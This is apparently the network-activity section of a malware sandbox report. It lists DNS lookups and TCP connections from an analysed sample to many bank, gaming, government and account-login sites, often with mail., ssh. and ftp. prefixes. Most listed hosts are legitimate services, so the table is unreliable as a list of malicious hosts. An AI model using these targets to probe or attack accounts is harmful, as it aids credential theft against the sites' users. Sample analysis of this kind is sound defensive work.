| RU | 87.240.132.67:80 | tcp | |
| RU | 87.240.132.67:80 | tcp | |
| RU | 87.240.132.67:80 | tcp | |
| N/A | 104.18.21.226:80 | tcp | |
| N/A | 104.18.21.226:80 | tcp | |
| RU | 87.240.132.67:443 | tcp | |
| RU | 87.240.132.67:443 | tcp | |
| NL | 95.142.206.2:443 | tcp | |
| US | 8.8.8.8:53 | ftp.shopee.ph | udp |
| US | 8.8.8.8:53 | imap.school.wvbs.org | udp |
| US | 8.8.8.8:53 | ssh.airbox.home | udp |
| US | 8.8.8.8:53 | mxa-004fae02.gslb.pphosted.com | udp |
| US | 8.8.8.8:53 | ftp.lista-serwerow.emecz.pl | udp |
| US | 8.8.8.8:53 | ssh.steamcommunity.com | udp |
| US | 8.8.8.8:53 | mail.accounts.shutterstock.com | udp |
| US | 8.8.8.8:53 | ftp.spwarta.mobidziennik.pl | udp |
| US | 8.8.8.8:53 | ssh.vio.edu.vn | udp |
| US | 8.8.8.8:53 | mailgate.app.blokada.org | udp |
| US | 8.8.8.8:53 | aolweb.aol.meb.gov.tr | udp |
| US | 8.8.8.8:53 | mail.myaccount.vndirect.com.vn | udp |
| US | 8.8.8.8:53 | mail.school.wvbs.org | udp |
| US | 8.8.8.8:53 | pop.airbox.home | udp |
| US | 8.8.8.8:53 | imap.skills.shawacademy.com | udp |
| US | 8.8.8.8:53 | mail.airbox.home | udp |
| US | 8.8.8.8:53 | mail.app.blokada.org | udp |
| US | 8.8.8.8:53 | mail.portal.health.go.ke | udp |
| US | 8.8.8.8:53 | mx3.mail.ovh.net | udp |
| US | 8.8.8.8:53 | help.steampowered.com | udp |
| US | 8.8.8.8:53 | mail.skills.shawacademy.com | udp |
| US | 8.8.8.8:53 | ssh.auth.riotgames.com | udp |
| US | 8.8.8.8:53 | mailgate.portal.yabatech.edu.ng | udp |
| US | 8.8.8.8:53 | mail.portal.yabatech.edu.ng | udp |
| US | 8.8.8.8:53 | mail.help.steampowered.com | udp |
| US | 8.8.8.8:53 | pop3.gameutha.com | udp |
| US | 8.8.8.8:53 | ftp.is-apps.telusinternational.com | udp |
| US | 8.8.8.8:53 | ssh.ncsrail.com | udp |
| US | 8.8.8.8:53 | pop3.portal.reemo.io | udp |
| US | 8.8.8.8:53 | pop.auth.riotgames.com | udp |
| US | 8.8.8.8:53 | mailgate.login.arduino.cc | udp |
| US | 8.8.8.8:53 | mail.forum.mobilism.org | udp |
| US | 8.8.8.8:53 | mailgate.forum.mobilism.org | udp |
| US | 8.8.8.8:53 | mail.students.kuccps.net | udp |
| US | 8.8.8.8:53 | ftp.id.vndirect.com.vn | udp |
| US | 8.8.8.8:53 | pop3.students.kuccps.net | udp |
| US | 8.8.8.8:53 | alt2.aspmx.l.google.com | udp |
| US | 8.8.8.8:53 | ssh.trade.vndirect.com.vn | udp |
| US | 8.8.8.8:53 | imap.portal.health.go.ke | udp |
| US | 8.8.8.8:53 | accounts.binance.com | udp |
| US | 8.8.8.8:53 | ssh.accounts.shutterstock.com | udp |
| US | 8.8.8.8:53 | mail.id.vndirect.com.vn | udp |
| US | 8.8.8.8:53 | ssh.help.steampowered.com | udp |
| US | 8.8.8.8:53 | ssh.users.nexusmods.com | udp |
| US | 8.8.8.8:53 | mail.id.zalo.me | udp |
| US | 8.8.8.8:53 | mailgate.skills.shawacademy.com | udp |
| TR | 195.142.246.58:80 | subesiz.vakifbank.com.tr | tcp |
| DE | 185.159.159.143:80 | account.protonvpn.com | tcp |
| TR | 185.68.222.101:80 | giris.ibb.istanbul | tcp |
| TR | 193.108.213.15:80 | sube.halkbank.com.tr | tcp |
| US | 104.18.9.28:80 | krunker.io | tcp |
| TR | 212.175.170.107:80 | aolweb.meb.gov.tr | tcp |
| TR | 212.175.170.107:80 | aolweb.meb.gov.tr | tcp |
| TR | 212.174.173.81:80 | esube.iskur.gov.tr | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| PL | 188.210.221.79:80 | mail.lista-minecraft.pl | tcp |
| TR | 95.0.131.147:80 | online.spor.istanbul | tcp |
| DE | 185.159.159.143:80 | account.protonvpn.com | tcp |
| US | 162.159.136.232:80 | discord.com | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| GB | 104.103.202.103:443 | help.steampowered.com | tcp |
| GB | 104.103.202.103:80 | help.steampowered.com | tcp |
| TR | 195.39.224.29:80 | internetbankaciligi.fibabanka.com.tr | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| TR | 195.39.224.29:80 | internetbankaciligi.fibabanka.com.tr | tcp |
| TR | 213.14.252.53:80 | bireysel.istanbulkart.istanbul | tcp |
| VN | 103.174.216.148:80 | vio.edu.vn | tcp |
| US | 8.8.8.8:53 | ssh.shopee.ph | udp |
| US | 8.8.8.8:53 | mail.remotedesktop.google.com | udp |
| US | 8.8.8.8:53 | mail.events.crowdsense.ai | udp |
| US | 8.8.8.8:53 | mailgate.events.crowdsense.ai | udp |
| US | 8.8.8.8:53 | mailgate.ny3.blynk.cloud | udp |
| US | 8.8.8.8:53 | pop3.store.steampowered.com | udp |
| US | 8.8.8.8:53 | pop.users.nexusmods.com | udp |
| US | 8.8.8.8:53 | mail.users.nexusmods.com | udp |
| US | 8.8.8.8:53 | ssh.gamejolt.com | udp |
| US | 8.8.8.8:53 | imap.help.steampowered.com | udp |
| US | 8.8.8.8:53 | mx1.mail.ovh.net | udp |
| US | 8.8.8.8:53 | mail.oauth.bpi.com.ph | udp |
| US | 8.8.8.8:53 | ssh.accounts.google.com | udp |
| US | 8.8.8.8:53 | mail.is-apps.telusinternational.com | udp |
| US | 8.8.8.8:53 | mail.id.zalo.me | udp |
| US | 8.8.8.8:53 | pop.ncsrail.com | udp |
| US | 8.8.8.8:53 | ssh.zahcomputers.pk | udp |
| US | 8.8.8.8:53 | imap.portal.reemo.io | udp |
| US | 8.8.8.8:53 | ftp.lista-minecraft.pl | udp |
| US | 8.8.8.8:53 | mugenarchive.com | udp |
| US | 8.8.8.8:53 | ssh.oauth.bpi.com.ph | udp |
| US | 8.8.8.8:53 | ssh.remotedesktop.google.com | udp |
| US | 8.8.8.8:53 | users.nexusmods.com | udp |
| US | 8.8.8.8:53 | ftp.trade.vndirect.com.vn | udp |
| US | 8.8.8.8:53 | mail.help.steampowered.com | udp |
| US | 8.8.8.8:53 | mail.account.protonvpn.com | udp |
| RU | 87.240.132.67:443 | tcp | |
| RU | 87.240.132.67:443 | tcp | |
| RU | 87.240.132.67:443 | tcp | |
| RU | 87.240.132.67:443 | tcp | |
| RU | 87.240.132.67:443 | tcp | |
| RU | 87.240.132.67:443 | tcp | |
| US | 162.159.136.232:80 | discord.com | tcp |
| VN | 49.213.95.230:80 | id.zalo.me | tcp |
| TR | 212.175.170.107:80 | aolweb.meb.gov.tr | tcp |
| US | 34.120.58.86:80 | is-apps.telusinternational.com | tcp |
| GB | 18.245.253.33:80 | accounts.shutterstock.com | tcp |
| TR | 213.14.252.53:80 | bireysel.istanbulkart.istanbul | tcp |
| PL | 185.36.169.113:80 | ftp.lista-serwerow.emecz.pl | tcp |
| PL | 82.177.190.71:443 | dolnoslaskie.edu.com.pl | tcp |
| RU | 213.180.204.24:80 | passport.yandex.com.tr | tcp |
| PL | 91.209.116.56:80 | moje.gwo.pl | tcp |
| IT | 185.196.8.22:80 | ckrehdr.net | tcp |
| TR | 194.24.224.11:80 | bireysel.ziraatbank.com.tr | tcp |
| SG | 18.136.136.90:80 | azota.vn | tcp |
| TR | 95.0.131.147:80 | online.spor.istanbul | tcp |
| US | 104.26.11.45:443 | spwarta.mobidziennik.pl | tcp |
| TR | 185.68.222.101:443 | giris.ibb.istanbul | tcp |
| PL | 188.210.221.79:80 | ftp.lista-minecraft.pl | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| TR | 193.108.213.15:443 | sube.halkbank.com.tr | tcp |
| PL | 185.36.169.113:80 | ftp.lista-serwerow.emecz.pl | tcp |
| PH | 203.161.188.178:80 | oauth.bpi.com.ph | tcp |
| SG | 143.92.75.92:80 | shopee.ph | tcp |
| SG | 157.230.193.203:80 | sshstores.net | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | ftp.steamcommunity.com | udp |
| US | 8.8.8.8:53 | ssh.vio.edu.vn | udp |
| US | 8.8.8.8:53 | ftp.discord.com | udp |
| US | 8.8.8.8:53 | pop3.portal.health.go.ke | udp |
| US | 8.8.8.8:53 | mailgate.forum.mobilism.org | udp |
| US | 8.8.8.8:53 | ssh.id.zalo.me | udp |
| US | 8.8.8.8:53 | ssh.trade.vndirect.com.vn | udp |
| US | 8.8.8.8:53 | ssh.krunker.io | udp |
| US | 8.8.8.8:53 | subesiz.vakifbank.com.tr | udp |
| US | 8.8.8.8:53 | mail.azota.vn | udp |
| US | 8.8.8.8:53 | imap.pakrail.gov.pk | udp |
| US | 8.8.8.8:53 | alt4.aspmx.l.google.com | udp |
| US | 8.8.8.8:53 | mail.login.arduino.cc | udp |
| US | 8.8.8.8:53 | mailgate.ny3.blynk.cloud | udp |
| US | 8.8.8.8:53 | en.onlinesoccermanager.com | udp |
| US | 8.8.8.8:53 | imap.portal.health.go.ke | udp |
| US | 8.8.8.8:53 | playsultan.com | udp |
| US | 8.8.8.8:53 | imap.school.wvbs.org | udp |
| US | 8.8.8.8:53 | mail.auth.riotgames.com | udp |
| US | 8.8.8.8:53 | pop3.account.protonvpn.com | udp |
| RU | 213.180.204.24:80 | passport.yandex.com.tr | tcp |
| DE | 185.159.159.143:443 | account.protonvpn.com | tcp |
| GB | 104.103.202.103:80 | help.steampowered.com | tcp |
| GB | 104.103.202.103:443 | help.steampowered.com | tcp |
| US | 8.8.8.8:53 | mailgate.forum.mobilism.org | udp |
| US | 8.8.8.8:53 | ssh.spwarta.mobidziennik.pl | udp |
| US | 8.8.8.8:53 | mail.students.kuccps.net | udp |
| US | 8.8.8.8:53 | airbox.home | udp |
| US | 8.8.8.8:53 | 33.253.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.224.24.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ssh.id.vndirect.com.vn | udp |
| US | 8.8.8.8:53 | mail.myaccount.vndirect.com.vn | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| US | 8.8.8.8:53 | pop.myaccount.vndirect.com.vn | udp |
| US | 8.8.8.8:53 | ssh.ncsrail.com | udp |
| VN | 125.212.254.122:80 | trade.vndirect.com.vn | tcp |
| US | 104.18.4.160:80 | gamejolt.com | tcp |
| GB | 104.103.202.103:80 | steamcommunity.com | tcp |
| TR | 195.87.92.188:80 | e-devlet.riskmerkezi.org | tcp |
| US | 8.8.8.8:53 | ftp.oauth.bpi.com.ph | udp |
| US | 8.8.8.8:53 | mailgate.help.steampowered.com | udp |
| US | 8.8.8.8:53 | aolweb.aol.meb.gov.tr | udp |
| US | 8.8.8.8:53 | imap.dash.studentsearncash.co | udp |
| US | 8.8.8.8:53 | ftp.aolweb.meb.gov.tr | udp |
| US | 8.8.8.8:53 | mail.account.protonvpn.com | udp |
| US | 8.8.8.8:53 | mail.id.vndirect.com.vn | udp |
| US | 8.8.8.8:53 | mailgate.events.crowdsense.ai | udp |
| US | 8.8.8.8:53 | mail.events.crowdsense.ai | udp |
| US | 8.8.8.8:53 | mail.remotedesktop.google.com | udp |
| US | 8.8.8.8:53 | pop.ncsrail.com | udp |
| US | 8.8.8.8:53 | _dc-mx.6677cb836089.mugenarchive.com | udp |
| US | 8.8.8.8:53 | ssh.remotedesktop.google.com | udp |
| US | 8.8.8.8:53 | pop.id.zalo.me | udp |
| US | 8.8.8.8:53 | ssh.oauth.bpi.com.ph | udp |
| US | 8.8.8.8:53 | ftp.moje.gwo.pl | udp |
| US | 8.8.8.8:53 | mail.store.steampowered.com | udp |
| US | 8.8.8.8:53 | relay.events.crowdsense.ai | udp |
| US | 8.8.8.8:53 | pop3.pakrail.gov.pk | udp |
| US | 8.8.8.8:53 | help.steampowered.com | udp |
| US | 8.8.8.8:53 | imap.portal.reemo.io | udp |
| US | 8.8.8.8:53 | mailgate.store.steampowered.com | udp |
| US | 8.8.8.8:53 | ssh.gamejolt.com | udp |
| US | 8.8.8.8:53 | mail.users.nexusmods.com | udp |
| US | 8.8.8.8:53 | pop.trade.vndirect.com.vn | udp |
| US | 8.8.8.8:53 | mail.trade.vndirect.com.vn | udp |
| VN | 202.160.124.58:80 | id.vndirect.com.vn | tcp |
| PL | 188.210.221.79:80 | ftp.lista-minecraft.pl | tcp |
| TR | 195.142.246.58:80 | subesiz.vakifbank.com.tr | tcp |
| TR | 212.175.170.107:80 | aolweb.meb.gov.tr | tcp |
| GB | 18.245.143.55:80 | accounts.binance.com | tcp |
| TR | 212.175.170.107:80 | aolweb.meb.gov.tr | tcp |
| US | 104.18.9.28:443 | krunker.io | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| US | 172.67.70.229:80 | egitimhane.com | tcp |
| VN | 49.213.95.230:80 | id.zalo.me | tcp |
| PL | 188.210.221.79:80 | ftp.lista-minecraft.pl | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| US | 8.8.8.8:53 | ftp.unknowncheats.me | udp |
| US | 8.8.8.8:53 | pop.nairaland.com | udp |
| US | 8.8.8.8:53 | mail.oauth.bpi.com.ph | udp |
| US | 8.8.8.8:53 | mail.accounts.shutterstock.com | udp |
| US | 8.8.8.8:53 | mailgate.ny3.blynk.cloud | udp |
| US | 8.8.8.8:53 | vddswrwooe4osvbi3yy3gdgi575xmw6dwguqvdehvkzvbs3quzca.mx-verification.google.com | udp |
| US | 8.8.8.8:53 | ssh.airbox.home | udp |
| US | 8.8.8.8:53 | mailgate.portal.yabatech.edu.ng | udp |
| US | 8.8.8.8:53 | imap.account.protonvpn.com | udp |
| US | 8.8.8.8:53 | imap.auth.riotgames.com | udp |
| US | 8.8.8.8:53 | relay.login.arduino.cc | udp |
| US | 8.8.8.8:53 | ssh.steamcommunity.com | udp |
| US | 8.8.8.8:53 | pop.anilist.co | udp |
| US | 8.8.8.8:53 | ssh.is-apps.telusinternational.com | udp |
| US | 8.8.8.8:53 | ssh.moje.gwo.pl | udp |
| TR | 195.87.92.188:80 | e-devlet.riskmerkezi.org | tcp |
| US | 104.16.119.50:443 | auth.riotgames.com | tcp |
| TR | 195.142.246.58:80 | subesiz.vakifbank.com.tr | tcp |
| GB | 18.245.253.33:80 | accounts.shutterstock.com | tcp |
| TR | 193.108.213.15:80 | sube.halkbank.com.tr | tcp |
| PL | 82.177.190.74:80 | ftp.dolnoslaskie.edu.com.pl | tcp |
| PL | 185.36.169.113:443 | ftp.lista-serwerow.emecz.pl | tcp |
| PL | 91.209.116.56:80 | moje.gwo.pl | tcp |
| US | 162.159.136.232:80 | discord.com | tcp |
| US | 172.67.70.229:80 | egitimhane.com | tcp |
| US | 104.26.11.45:80 | spwarta.mobidziennik.pl | tcp |
| TR | 85.111.38.82:80 | giris.eba.gov.tr | tcp |
| US | 8.8.8.8:53 | mail.app.blokada.org | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| US | 8.8.8.8:53 | pop.help.steampowered.com | udp |
| US | 8.8.8.8:53 | gamejolt.com | udp |
| US | 8.8.8.8:53 | mailgate.portal.health.go.ke | udp |
| US | 8.8.8.8:53 | ssh.discord.com | udp |
| US | 8.8.8.8:53 | app.tinyletter.com | udp |
| US | 8.8.8.8:53 | imap.pakrail.gov.pk | udp |
| US | 8.8.8.8:53 | mail.spwarta.mobidziennik.pl | udp |
| US | 8.8.8.8:53 | ssh.account.protonvpn.com | udp |
| US | 8.8.8.8:53 | mixlr.com | udp |
| TR | 212.174.173.81:80 | esube.iskur.gov.tr | tcp |
| VN | 202.160.124.82:80 | myaccount.vndirect.com.vn | tcp |
| TR | 185.68.222.101:80 | giris.ibb.istanbul | tcp |
| US | 104.21.83.66:80 | mugenarchive.com | tcp |
| DE | 185.159.159.143:80 | account.protonvpn.com | tcp |
| US | 8.8.8.8:53 | pop.ncsrail.com | udp |
| US | 8.8.8.8:53 | mail.ny3.blynk.cloud | udp |
| US | 104.21.11.165:80 | zahcomputers.pk | tcp |
| US | 8.8.8.8:53 | ftp.krunker.io | udp |
| US | 8.8.8.8:53 | aolweb.aol.meb.gov.tr | udp |
| TR | 213.14.252.53:80 | bireysel.istanbulkart.istanbul | tcp |
| US | 8.8.8.8:53 | mail.help.steampowered.com | udp |
| US | 8.8.8.8:53 | airbox.home | udp |
| US | 8.8.8.8:53 | mail.skills.shawacademy.com | udp |
| US | 8.8.8.8:53 | mail.portal.reemo.io | udp |
| US | 8.8.8.8:53 | mail.steamcommunity.com | udp |
| PH | 203.161.188.178:80 | oauth.bpi.com.ph | tcp |
| GB | 104.103.202.103:80 | steamcommunity.com | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| US | 104.26.12.251:80 | unknowncheats.me | tcp |
| TR | 195.39.224.29:80 | internetbankaciligi.fibabanka.com.tr | tcp |
| GB | 104.103.202.103:80 | steamcommunity.com | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| DE | 173.249.52.237:80 | ftp.ncsrail.com | tcp |
| US | 8.8.8.8:53 | mailgate.forum.mobilism.org | udp |
| US | 8.8.8.8:53 | mail.myaccount.vndirect.com.vn | udp |
| US | 8.8.8.8:53 | ssh.lista-serwerow.emecz.pl | udp |
| US | 8.8.8.8:53 | mail.students.kuccps.net | udp |
| US | 8.8.8.8:53 | mxb-004fae02.gslb.pphosted.com | udp |
| US | 8.8.8.8:53 | vio.edu.vn | udp |
| US | 8.8.8.8:53 | shopee.ph | udp |
| US | 8.8.8.8:53 | pop.remotedesktop.google.com | udp |
| US | 8.8.8.8:53 | mailgate.help.steampowered.com | udp |
| US | 8.8.8.8:53 | mailgate.school.wvbs.org | udp |
| US | 8.8.8.8:53 | imap.gameutha.com | udp |
| US | 8.8.8.8:53 | mail.is-apps.telusinternational.com | udp |
| US | 8.8.8.8:53 | mail.account.protonvpn.com | udp |
| US | 8.8.8.8:53 | mail.events.crowdsense.ai | udp |
| US | 8.8.8.8:53 | mail.remotedesktop.google.com | udp |
| US | 8.8.8.8:53 | ftp.moje.gwo.pl | udp |
| US | 8.8.8.8:53 | pop.trade.vndirect.com.vn | udp |
| US | 8.8.8.8:53 | mailgate.store.steampowered.com | udp |
| US | 8.8.8.8:53 | help.steampowered.com | udp |
| US | 8.8.8.8:53 | mail.store.steampowered.com | udp |
| US | 8.8.8.8:53 | relay.events.crowdsense.ai | udp |
| US | 8.8.8.8:53 | ssh.myaccount.vndirect.com.vn | udp |
| US | 8.8.8.8:53 | ssh.gamejolt.com | udp |
| US | 8.8.8.8:53 | ssh.oauth.bpi.com.ph | udp |
| US | 8.8.8.8:53 | mail.sshstores.net | udp |
| US | 8.8.8.8:53 | ftp.giris.ibb.istanbul | udp |
| US | 8.8.8.8:53 | ssh.shopee.ph | udp |
| US | 8.8.8.8:53 | ssh.steamcommunity.com | udp |
| US | 8.8.8.8:53 | ssh.id.vndirect.com.vn | udp |
| US | 8.8.8.8:53 | ssh.spwarta.mobidziennik.pl | udp |
| US | 8.8.8.8:53 | pop.myaccount.vndirect.com.vn | udp |
| US | 8.8.8.8:53 | mailgate.app.blokada.org | udp |
| TR | 195.39.224.29:80 | internetbankaciligi.fibabanka.com.tr | tcp |
| TR | 212.175.170.107:80 | aolweb.meb.gov.tr | tcp |
| US | 8.8.8.8:53 | ssh.lista-minecraft.pl | udp |
| US | 8.8.8.8:53 | ssh.dolnoslaskie.edu.com.pl | udp |
| US | 8.8.8.8:53 | mxa-004fae02.gslb.pphosted.com | udp |
| US | 8.8.8.8:53 | mail.trade.vndirect.com.vn | udp |
| US | 8.8.8.8:53 | ftp.internetbankaciligi.fibabanka.com.tr | udp |
| US | 8.8.8.8:53 | ftp.aolweb.meb.gov.tr | udp |
| US | 8.8.8.8:53 | pop3.pakrail.gov.pk | udp |
| US | 8.8.8.8:53 | pop.id.zalo.me | udp |
| TR | 212.174.173.81:443 | esube.iskur.gov.tr | tcp |
| RU | 213.180.204.24:80 | passport.yandex.com.tr | tcp |
| US | 8.8.8.8:53 | imap.account.protonvpn.com | udp |
| US | 8.8.8.8:53 | vddswrwooe4osvbi3yy3gdgi575xmw6dwguqvdehvkzvbs3quzca.mx-verification.google.com | udp |
| US | 8.8.8.8:53 | ssh.airbox.home | udp |
| US | 8.8.8.8:53 | imap.auth.riotgames.com | udp |
| US | 8.8.8.8:53 | ftp.unknowncheats.me | udp |
| US | 8.8.8.8:53 | pop.nairaland.com | udp |
| US | 8.8.8.8:53 | mail.portal.yabatech.edu.ng | udp |
| US | 8.8.8.8:53 | mail.auth.riotgames.com | udp |
| US | 8.8.8.8:53 | ftp.discord.com | udp |
| US | 8.8.8.8:53 | ssh.is-apps.telusinternational.com | udp |
| US | 8.8.8.8:53 | mail.oauth.bpi.com.ph | udp |
| US | 8.8.8.8:53 | mailgate.portal.reemo.io | udp |
| US | 8.8.8.8:53 | ftp.account.protonvpn.com | udp |
| TR | 213.14.252.53:80 | bireysel.istanbulkart.istanbul | tcp |
| VN | 125.212.254.122:80 | trade.vndirect.com.vn | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| US | 104.16.119.50:80 | auth.riotgames.com | tcp |
| TR | 193.108.213.15:80 | sube.halkbank.com.tr | tcp |
| US | 104.18.4.160:80 | gamejolt.com | tcp |
| US | 8.8.8.8:53 | ftp.esube.iskur.gov.tr | udp |
| US | 8.8.8.8:53 | mx2.zoho.com | udp |
| US | 8.8.8.8:53 | imap.store.steampowered.com | udp |
| US | 8.8.8.8:53 | mailgate.app.blokada.org | udp |
| US | 8.8.8.8:53 | ssh.trade.vndirect.com.vn | udp |
| US | 8.8.8.8:53 | relay.forum.mobilism.org | udp |
| US | 8.8.8.8:53 | ssh.vio.edu.vn | udp |
| US | 8.8.8.8:53 | mail.login.arduino.cc | udp |
| US | 8.8.8.8:53 | mailgate.login.arduino.cc | udp |
| US | 8.8.8.8:53 | mail.portal.health.go.ke | udp |
| US | 8.8.8.8:53 | mail.forum.mobilism.org | udp |
| US | 8.8.8.8:53 | ssh.account.protonvpn.com | udp |
| US | 8.8.8.8:53 | imap.pakrail.gov.pk | udp |
| US | 8.8.8.8:53 | pop.spwarta.mobidziennik.pl | udp |
| US | 8.8.8.8:53 | pop3.auth.riotgames.com | udp |
| US | 8.8.8.8:53 | ssh.unknowncheats.me | udp |
| US | 8.8.8.8:53 | pop.accounts.shutterstock.com | udp |
| US | 8.8.8.8:53 | mailgate.skills.shawacademy.com | udp |
| TR | 212.175.170.107:80 | aolweb.meb.gov.tr | tcp |
| US | 172.67.70.229:443 | egitimhane.com | tcp |
| US | 104.18.9.28:80 | krunker.io | tcp |
| PL | 185.36.169.113:80 | ssh.lista-serwerow.emecz.pl | tcp |
| US | 104.16.90.146:80 | en.onlinesoccermanager.com | tcp |
| TR | 194.24.224.11:80 | bireysel.ziraatbank.com.tr | tcp |
| TR | 212.174.173.81:443 | esube.iskur.gov.tr | tcp |
| TR | 85.111.38.82:80 | giris.eba.gov.tr | tcp |
| US | 104.21.82.210:80 | playsultan.com | tcp |
| US | 104.21.82.210:80 | playsultan.com | tcp |
| TR | 85.111.38.82:80 | giris.eba.gov.tr | tcp |
| RU | 213.180.204.24:80 | passport.yandex.com.tr | tcp |
| TR | 185.68.222.101:80 | giris.ibb.istanbul | tcp |
| IT | 185.196.8.22:80 | ckrehdr.net | tcp |
| GB | 104.103.202.103:80 | help.steampowered.com | tcp |
| US | 162.159.136.232:80 | discord.com | tcp |
| TR | 95.0.131.147:80 | online.spor.istanbul | tcp |
| VN | 202.160.124.82:80 | myaccount.vndirect.com.vn | tcp |
| PH | 203.161.188.178:80 | oauth.bpi.com.ph | tcp |
| PH | 121.96.38.199:80 | mybdo.com.ph | tcp |
| US | 205.201.132.23:80 | app.tinyletter.com | tcp |
| US | 8.8.8.8:53 | imap.users.nexusmods.com | udp |
| US | 8.8.8.8:53 | mail.giris.ibb.istanbul | udp |
| GB | 104.103.202.103:80 | help.steampowered.com | tcp |
| TR | 195.87.92.188:80 | e-devlet.riskmerkezi.org | tcp |
| TR | 195.142.246.58:80 | subesiz.vakifbank.com.tr | tcp |
| US | 8.8.8.8:53 | is-apps.telusinternational.com | udp |
| US | 8.8.8.8:53 | mail.help.steampowered.com | udp |
| US | 8.8.8.8:53 | mail.users.nexusmods.com | udp |
| US | 8.8.8.8:53 | ssh.steamcommunity.com | udp |
| US | 8.8.8.8:53 | mail.moje.gwo.pl | udp |
| US | 8.8.8.8:53 | mail.school.wvbs.org | udp |
| US | 8.8.8.8:53 | subesiz.vakifbank.com.tr | udp |
| PH | 203.177.92.210:80 | mybdo.com.ph | tcp |
| VN | 202.160.124.58:80 | id.vndirect.com.vn | tcp |
| US | 8.8.8.8:53 | mail.auth.riotgames.com | udp |
| US | 8.8.8.8:53 | ssh.sube.halkbank.com.tr | udp |
| US | 8.8.8.8:53 | mail.skills.shawacademy.com | udp |
| US | 8.8.8.8:53 | aolweb.aol.meb.gov.tr | udp |
| US | 8.8.8.8:53 | mail.aolweb.aol.meb.gov.tr | udp |
| US | 8.8.8.8:53 | ftp.krunker.io | udp |
| US | 8.8.8.8:53 | mail.aolweb.meb.gov.tr | udp |
| US | 8.8.8.8:53 | mailgate.forum.mobilism.org | udp |
| US | 8.8.8.8:53 | mail.sshstores.net | udp |
| US | 8.8.8.8:53 | mobile.twitter.com | udp |
| US | 8.8.8.8:53 | ssh.accounts.shutterstock.com | udp |
| US | 8.8.8.8:53 | mail.portal.reemo.io | udp |
| US | 8.8.8.8:53 | mail.students.kuccps.net | udp |
| US | 8.8.8.8:53 | ssh.krunker.io | udp |
| US | 8.8.8.8:53 | pop.id.vndirect.com.vn | udp |
| US | 8.8.8.8:53 | mail.remotedesktop.google.com | udp |
| US | 8.8.8.8:53 | accounts.binance.com | udp |
| US | 8.8.8.8:53 | pop.nairaland.com | udp |
| US | 8.8.8.8:53 | mail.sube.halkbank.com.tr | udp |
| US | 8.8.8.8:53 | ftp.online.spor.istanbul | udp |
| US | 8.8.8.8:53 | ssh.aolweb.meb.gov.tr | udp |
| US | 8.8.8.8:53 | imap.remotedesktop.google.com | udp |
| US | 8.8.8.8:53 | ssh.oauth.bpi.com.ph | udp |
| US | 8.8.8.8:53 | mail.account.protonvpn.com | udp |
| US | 8.8.8.8:53 | ssh.shopee.ph | udp |
| US | 8.8.8.8:53 | mailgate.gameutha.com | udp |
| US | 8.8.8.8:53 | mailgate.help.steampowered.com | udp |
| US | 8.8.8.8:53 | mail.events.crowdsense.ai | udp |
| US | 8.8.8.8:53 | ftp.giris.ibb.istanbul | udp |
| US | 8.8.8.8:53 | pop.myaccount.vndirect.com.vn | udp |
| US | 8.8.8.8:53 | mailgate.store.steampowered.com | udp |
| US | 8.8.8.8:53 | ssh.id.vndirect.com.vn | udp |
| US | 8.8.8.8:53 | mailgate.school.wvbs.org | udp |
| US | 8.8.8.8:53 | ssh.spwarta.mobidziennik.pl | udp |
| US | 8.8.8.8:53 | mail.app.blokada.org | udp |
| US | 8.8.8.8:53 | ftp.passport.yandex.com.tr | udp |
| US | 8.8.8.8:53 | gizmoetc.dealpos.com | udp |
| US | 8.8.8.8:53 | mail.forum.mobilism.org | udp |
| US | 8.8.8.8:53 | ssh.discord.com | udp |
| US | 8.8.8.8:53 | forum.scriptcase.net | udp |
| US | 8.8.8.8:53 | account.ui.com | udp |
| US | 8.8.8.8:53 | ejournals.ph | udp |
| US | 8.8.8.8:53 | mailgate.login.arduino.cc | udp |
| US | 8.8.8.8:53 | www.egitimhane.com | udp |
| US | 8.8.8.8:53 | mail.airbox.home | udp |
| US | 8.8.8.8:53 | mail.steamcommunity.com | udp |
| US | 8.8.8.8:53 | mail.subesiz.vakifbank.com.tr | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| US | 8.8.8.8:53 | pop3.airbox.home | udp |
| US | 8.8.8.8:53 | pop3.pakrail.gov.pk | udp |
| US | 8.8.8.8:53 | ftp.aolweb.meb.gov.tr | udp |
| US | 8.8.8.8:53 | ssh.lista-minecraft.pl | udp |
| US | 8.8.8.8:53 | mxa-004fae02.gslb.pphosted.com | udp |
| US | 8.8.8.8:53 | mail.trade.vndirect.com.vn | udp |
| VN | 103.160.85.100:80 | vio.edu.vn | tcp |
| US | 8.8.8.8:53 | ftp.steamcommunity.com | udp |
| US | 8.8.8.8:53 | pop3.account.protonvpn.com | udp |
| US | 8.8.8.8:53 | mail.accounts.shutterstock.com | udp |
| US | 8.8.8.8:53 | mailgate.ny3.blynk.cloud | udp |
| US | 8.8.8.8:53 | vddswrwooe4osvbi3yy3gdgi575xmw6dwguqvdehvkzvbs3quzca.mx-verification.google.com | udp |
| PH | 121.96.38.199:80 | mybdo.com.ph | tcp |
| TR | 195.87.92.188:80 | e-devlet.riskmerkezi.org | tcp |
| PL | 188.210.221.79:80 | ftp.lista-minecraft.pl | tcp |
| DE | 185.159.159.143:80 | account.protonvpn.com | tcp |
| US | 104.26.11.45:80 | spwarta.mobidziennik.pl | tcp |
| US | 104.16.119.50:80 | auth.riotgames.com | tcp |
| GB | 18.245.253.33:80 | accounts.shutterstock.com | tcp |
| US | 8.8.8.8:53 | mxb-004fae02.gslb.pphosted.com | udp |
| US | 8.8.8.8:53 | pop.is-apps.telusinternational.com | udp |
| US | 8.8.8.8:53 | ssh.myaccount.vndirect.com.vn | udp |
